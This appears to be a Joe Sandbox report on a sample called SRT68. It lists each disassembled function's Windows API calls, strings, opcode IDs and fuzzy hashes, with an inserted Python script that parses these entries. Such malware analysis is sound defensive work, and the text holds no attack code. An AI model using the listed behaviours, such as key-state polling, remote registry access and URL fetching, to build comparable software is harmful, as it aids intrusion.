                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1173514356-4108050209
                                                                      • Opcode ID: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
                                                                      • Instruction ID: b3c4892e15a426062dd68bf85ceaf1da34a80186edc88f3cb744dc4126d3a9c9
                                                                      • Opcode Fuzzy Hash: fd6ade41b4dd2dc4169f7fb44fc69997826d1a8d662f7ebc520d3f4ac338190f
                                                                      • Instruction Fuzzy Hash: D341A0752053029FE722DF28C848F6ABBE8EF85314F14496DFAA5972D1D730A605CB52
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
                                                                        • Part of subcall function 00FA784B: _memmove.LIBCMT ref: 00FA7899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower_memmove
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 3425801089-567219261
                                                                      • Opcode ID: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
                                                                      • Instruction ID: b74dec7a65c5d567807b07eb9b7f6a17c4723a6735c71ca2feeeb132c801e533
                                                                      • Opcode Fuzzy Hash: 0efdfa7bfcfe5dce731399431e5e08e45ef2eed2301f3338ff976396fdca60b2
                                                                      • Instruction Fuzzy Hash: 0B31B07190420AEBCF00EF98CC559EEB3B5FF05320B008659E8A9976D5DB39E905CB80
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FF8F14
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FF8F27
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FF8F57
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 365058703-1403004172
                                                                      • Opcode ID: 0e19affee22d64c392843810a219e70cebb789ba0d1e567f21bf0e30056cff60
                                                                      • Instruction ID: b12030a2be556af866a6cb4769bc0980607e7fa6d26bbbfcbf0d1c1c6a30a9f9
                                                                      • Opcode Fuzzy Hash: 0e19affee22d64c392843810a219e70cebb789ba0d1e567f21bf0e30056cff60
                                                                      • Instruction Fuzzy Hash: 7721D5B5A00109BEDB24ABB08C45DFFB779DF493A0F144519F955971E1DF3D480AB610
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011872
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010118A2
                                                                      • InternetCloseHandle.WININET(00000000), ref: 010118E9
                                                                        • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                        • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
                                                                      • Instruction ID: 828475eee851a34522e4e312a9770c3acfd0db540bd5549d3c312ef83794d03b
                                                                      • Opcode Fuzzy Hash: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
                                                                      • Instruction Fuzzy Hash: 5E21B0B1500309BFEB259FA4DC84EBF77FDEB48684F10812AFA85D2144DB798D0597A1
                                                                      APIs
                                                                        • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                        • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                        • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01026461
                                                                      • LoadLibraryW.KERNEL32(?), ref: 01026468
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0102647D
                                                                      • DestroyWindow.USER32(?), ref: 01026485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                      • Instruction ID: 448664710f8c720a092376b449f01b557a167af4c66bb2ece7c7b7eb2df7a8c4
                                                                      • Opcode Fuzzy Hash: aa4a56b391e2231cbace15384f2738a75b04089293781a9b976458e1c724b7d1
                                                                      • Instruction Fuzzy Hash: 8A218E71100226ABEF214E68DC54EBB77EEEB49364F108669FED093091DB369C419760
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 01006DBC
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006DEF
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 01006E01
                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01006E3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                      • Instruction ID: 5c92dff753687d1a1634bf86fbfe8eb982f0bb1ac907fdcd0f3305ac17fc8daa
                                                                      • Opcode Fuzzy Hash: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
                                                                      • Instruction Fuzzy Hash: 2E21657190030AABEB31AF29D804A9A7BF9EF45720F20465AFDE1D72D0D7729964CB50
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 01006E89
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006EBB
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 01006ECC
                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01006F06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                      • Instruction ID: cb8671629d5c13721a06d3c54322c7c20ea60e8ac1df166889b59cffb00914c6
                                                                      • Opcode Fuzzy Hash: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
                                                                      • Instruction Fuzzy Hash: 3121907150034A9BFB319F6DD804AAA77E9AF45720F200A59FDE0D72C0D772A8618B60
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100AC54
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0100ACA8
                                                                      • __swprintf.LIBCMT ref: 0100ACC1
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0102F910), ref: 0100ACFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu
                                                                      • API String ID: 3164766367-685833217
                                                                      • Opcode ID: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                      • Instruction ID: c7cb02d55cc12ff263c10eba01beb63b1f47e995571e915328e04faa648ad8e9
                                                                      • Opcode Fuzzy Hash: ca7154fa73ffec96ae5cda672f7d184923f3749f9474913372702f42aa76cdb0
                                                                      • Instruction Fuzzy Hash: 8F219D70A0020AAFCB20DF65CD45DAF7BB8EF4A714B1040A9F949EB251DA75EA01DB21
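The Python script below is an added example and is not part of the Joe Sandbox report, the IDA plugin, or the analysed sample. It parses function entries in the listing format used above (the APIs bullets, the Memory Dump Source line and the Similarity fields) into records, rebases each call reference against the Offset given on the Source File line, and groups entries by their API String ID. The sample input is a constructed excerpt assembled from entries on this page (the LIBCMT subcall line is borrowed from a different entry to exercise the no-argument form). The two CreatePipe/CreateFileW entries share one API String ID but carry distinct Opcode IDs, which is the practical caveat: the API String ID describes the set of imports and strings, not the function body, so signatures or cross-report matching should key on the Opcode ID or the Instruction Fuzzy Hash.

```python
"""Parse Joe Sandbox IDA-plugin 'Similarity' function entries into records.

Added example, not part of the sandbox report. SAMPLE is a constructed
excerpt built from entries on this page, trimmed to the lines the parser uses.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 01006DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006DEF
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01006E3B
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: ef84e88fedac4017691ad1505a8213dc1462e2b33457c9b2d9b1796a4433a4bf
• Instruction Fuzzy Hash: 2E21657190030AABEB31AF29D804A9A7BF9EF45720F20465AFDE1D72D0D7729964CB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 01006E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01006EBB
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 01006F06
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: a456e60df7737ea44d4a96b26407790c148c2d1444273ee9e97f07c2adb27ff4
• Instruction Fuzzy Hash: 3121907150034A9BFB319F6DD804AAA77E9AF45720F200A59FDE0D72C0D772A8618B60
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011872
• InternetCloseHandle.WININET(00000000), ref: 010118E9
  • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
  • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 43fd5fab9f5b564f7150085bf1316b9ee989889a10cec0ae5935da8dcf536d6d
"""

# One API bullet: optional "Part of subcall function <addr>:" prefix, then
# Name.MODULE(args), ref: <addr>. LIBCMT entries have no argument list.
API_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9_]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(
    r"^\s*[•*-]?\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File):\s*(?P<val>.*?)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                      # call-site address as printed in the report
    subcall_of: Optional[str]     # address of the callee when the API is indirect


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID")

    def apis(self, include_subcalls=False):
        """Set of MODULE!Name strings; indirect (subcall) APIs are opt-in."""
        return {f"{c.module}!{c.name}" for c in self.calls
                if include_subcalls or c.subcall_of is None}


def parse_entries(text):
    """Split the listing at each 'APIs' header and collect calls and fields."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Source File":
                off = re.search(r"Offset:\s*([0-9A-F]+)", m["val"])
                if off:  # image base of the dumped module, for rebasing refs
                    cur.fields["Image Base"] = int(off[1], 16)
    return entries


def call_rvas(entry):
    """Direct call sites as RVAs relative to the dump's image base."""
    base = entry.fields.get("Image Base", 0)
    return {f"{c.module}!{c.name}": int(c.ref, 16) - base
            for c in entry.calls if c.subcall_of is None}


def group_by_api_string_id(entries):
    """Opcode IDs per API String ID; more than one entry means the ID is not unique."""
    groups = defaultdict(list)
    for e in entries:
        key = e.fields.get("API String ID")
        if key:
            groups[key].append(e.opcode_id)
    return dict(groups)


def find_callers(entries, api):
    """Opcode IDs of entries that call `api` (bare name or MODULE!Name)."""
    return [e.opcode_id for e in entries
            if any(api in (c.name, f"{c.module}!{c.name}") for c in e.calls)]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for key, ids in group_by_api_string_id(parsed).items():
        print(key, "->", len(ids), "function(s)")
    print("CreatePipe callers:", find_callers(parsed, "CreatePipe"))
```

Run it on a full report by reading the saved page text into `parse_entries` instead of `SAMPLE`; the `Image Base` taken from the Offset field lets call-site RVAs be compared across runs where the module was mapped at a different address.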
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 01001B19
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0101EC07
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0101EC37
                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0101ED6A
                                                                      • CloseHandle.KERNEL32(?), ref: 0101EDEB
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                      • String ID:
                                                                      • API String ID: 2364364464-0
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1559183368-0
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010200FD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102013C
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01020183
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 010201AF
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 010201BC
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3440857362-0
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101D927
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0101D9AA
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0101D9C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0101DA07
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0101DA21
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 327935632-0
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0100E61F
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0100E648
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0100E687
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0100E6AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0100E6B4
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1389676194-0
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00FA2357
                                                                      • ScreenToClient.USER32(010657B0,?), ref: 00FA2374
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00FA2399
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00FA23A7
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF63E7
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00FF6433
                                                                      • TranslateMessage.USER32(?), ref: 00FF645C
                                                                      • DispatchMessageW.USER32(?), ref: 00FF6466
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FF6475
                                                                      Similarity
                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                      • String ID:
                                                                      • API String ID: 2108273632-0
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00FF8A30
                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00FF8ADA
                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FF8AE2
                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00FF8AF0
                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FF8AF8
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00FFB204
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FFB221
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FFB259
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FFB27F
                                                                      • _wcsstr.LIBCMT ref: 00FFB289
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 3902887630-0
                                                                      • Opcode ID: 687ab36b8db4e707de6e87435779006bda72ad2ef1b6c834fa70c3df0affc717
                                                                      • Instruction ID: 71ae68e068da40715e8b090744fd934a5badbf032306bd915a355973ff91566c
                                                                      • Opcode Fuzzy Hash: 687ab36b8db4e707de6e87435779006bda72ad2ef1b6c834fa70c3df0affc717
                                                                      • Instruction Fuzzy Hash: 02210332604206AAEB265A35DC09F7F7BACDF49760F10802DF904DA161EF659C41A360
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0102B192
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0102B1B7
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0102B1CF
                                                                      • GetSystemMetrics.USER32(00000004), ref: 0102B1F8
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01010E90,00000000), ref: 0102B216
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
                                                                      • Instruction ID: c442da78625c6d4accc8f6c6c90cc6ab232f82f6806dd5725177ff3c9cf9757c
                                                                      • Opcode Fuzzy Hash: f39ec7e51e5246a5b8318364301aed45cb95f5df63cb5976614b88cfc8cc9944
                                                                      • Instruction Fuzzy Hash: 3C219171A10272AFDB709E3CDC04A6A3BA4FB06761F604768FAB6D71E0D73598118B90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FF9320
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9352
                                                                      • __itow.LIBCMT ref: 00FF936A
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FF9392
                                                                      • __itow.LIBCMT ref: 00FF93A3
                                                                      Memory Dump Source
